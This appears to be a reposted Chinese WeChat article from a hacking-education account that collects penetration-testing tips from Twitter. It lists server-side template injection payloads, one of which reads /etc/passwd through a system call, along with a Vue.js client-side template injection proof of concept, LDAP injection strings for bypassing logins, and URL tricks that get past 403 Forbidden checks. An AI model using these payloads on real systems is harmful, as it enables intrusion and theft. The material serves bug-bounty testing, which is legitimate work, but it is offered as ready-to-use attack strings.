人民日报林治波社长发出灵魂拷问:你们是没有常识,还是没有良知?

惨烈的高峰防御战—“圣元春战役”打响!

母子乱伦:和儿子做了,我该怎么办?

一定在信仰的指导下抗击疫情《马克思主义信仰:战胜新冠肺炎疫情的内生力量》

伊朗著名美女明星、奥斯卡影后被捕!

生成图片,分享到微信朋友圈
自由微信安卓APP发布,立即下载! | 提交文章网址
查看原文

干货 | Twitter渗透技巧搬运工(二)

HACK学习 HACK学习呀 2022-07-20
收录于合集
#twitter 4 个
#渗透测试 79 个
#漏洞挖掘 39 个

SSTI payloads

{2*2}[[7*7]]{{7*7}}{{7*'7'}}<%= 7 * 7 %>{{ request }}{{self}}{{dump(app)}}#{3*3}#{ 3 * 3 }{{ ''.__class__.__mro__[2].__subclasses__() }}{{['cat%20/etc/passwd']|filter('system')}}

原文地址:https://twitter.com/_bughunter/status/1522619419024887809?s=20&t=zoXT_4ZQw1vSYFjj1Lg_vA

Vue.js Javascript 库客户端模板注入

[PoC]

hxxp://host/?name={{this.constructor.constructor('alert("foo")')()}}

原文地址:https://twitter.com/wugeej/status/1354312840681668610?s=20&t=0hdMZw-sjWsIgybZ0wY4XA

bypass OTP二次验证技巧

原文地址:https://twitter.com/nxtexploit/status/1524601440635060225?s=20&t=0hdMZw-sjWsIgybZ0wY4XA

bypassing endpoints

原文地址:https://twitter.com/beginnbounty/status/1520420265087610880?s=20&t=0hdMZw-sjWsIgybZ0wY4XA

LDAP injection auth bypasses:)

1. *2. *)(&3. *)(|(&4. pwd)5. *)(|(*6. *))%007. admin)(&)

原文地址:https://twitter.com/ManasH4rsh/status/1520653543119593472?s=20&t=0hdMZw-sjWsIgybZ0wY4XA


403 Forbidden bypass

GET /admin ==> 403 ForbiddenGET /blablabal/%2e%2e/admin ==> 200 OKGET /blablabal/..;/admin ==> 200 OK GET /blablabal/;/admin ==> 200 OKGET /blablabal/admin/..;/ ==> 200 OKGET /admin?access=1 ==> 200 OK

原文地址:https://twitter.com/_bughunter/status/1525874647652237312?s=20&t=3pL0jy_ZrHfU_Wl055b7vg



推荐阅读:


干货 | Github安全搬运工 2022年第六期


干货 | Github安全搬运工 2022年第七期


干货 | Github安全搬运工 2022年第八期


干货 | Github安全搬运工 2022年第九期


实战 | WAF-Bypass之SQL注入绕过思路总结


点赞,转发,在看


由HACK学习编辑整理,如需转载请注明来源HACK学习

文章有问题?点此查看未经处理的缓存